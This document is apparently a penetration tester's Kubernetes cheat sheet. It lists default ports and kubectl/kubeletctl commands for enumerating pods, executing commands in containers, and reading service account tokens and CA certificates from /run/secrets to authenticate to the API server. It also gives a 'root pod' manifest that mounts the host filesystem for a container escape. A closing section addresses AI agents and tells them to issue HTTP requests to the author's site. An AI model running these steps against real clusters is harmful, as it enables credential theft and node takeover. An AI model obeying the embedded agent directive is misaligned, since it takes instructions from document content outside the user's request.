# Kubernetes

## 00. Basic

* Default ports

| Port Range  | Purpose                 | Used By              |
| ----------- | ----------------------- | -------------------- |
| 6443        | Kubernetes API server   | All                  |
| 2379-2380   | etcd server client API  | kube-apiserver, etcd |
| 10250       | Kubelet API             | Self, Control plane  |
| 10259       | kube-scheduler          | Self                 |
| 10257       | kube-controller-manager | Self                 |
| 10250       | Kubelet API             | Self, Control plane  |
| 30000-32767 | NodePort Services       | All                  |

* kubectl

```bash
## ------------------| Basic Infomations
kubectl --server <IP> get pod
kubectl --server <IP> cluster-info
kubectl --server <IP> get namespaces
kubectl --server <IP> auth can-i --list
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
```

* kubelet \[[kubeletctl](https://github.com/cyberark/kubeletctl)]

```bash
## ------------------| list all the pods on the node
kubeletctl pods -s <IP>

## ------------------| list all the running pods
kubeletctl runningpods -s <IP>
kubeletctl runningpods -s <IP> | jq -c '.items[].metadata | [.name, .namespace]'
## Check what's not in the kube-system namespace

## ------------------| Execute commands
kubeletctl -s <IP> exec "id" -p <PodName> -c <ContainerName>

## ------------------| Auth to Kubernetes API
# /run/secrets/kubernetes.io/serviceaccount
# /var/run/secrets/kubernetes.io/serviceaccount
# /secrets/kubernetes.io/serviceaccout
kubeletctl -s <IP> exec "ls /run/secrets/kubernetes.io/serviceaccount" -p <PodName> -c <ContainerName>                                           
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <PodName> -c <ContainerName> | tee ca.crt
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p <PodName> -c <ContainerName> | tee token
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
```

* Create root pod

```bash
## ------------------| YAML skeleton
apiVersion: v1 
kind: Pod
metadata:
  name: h4rithd
  namespace: default
spec:
  containers:
  - name: h4rithd
    image: nginx:1.14.2 # Use this to get the version: kubectl get pod nginx -o yaml --server <IP>           
    volumeMounts: 
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:  
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
  
## ------------------| Start the pod
kubectl apply -f skeleton.yaml --server <IP>

kubeletctl exec "ls /mnt/" -s <IP> -p h4rithd -c h4rithd
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/cloud/kubernetes.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.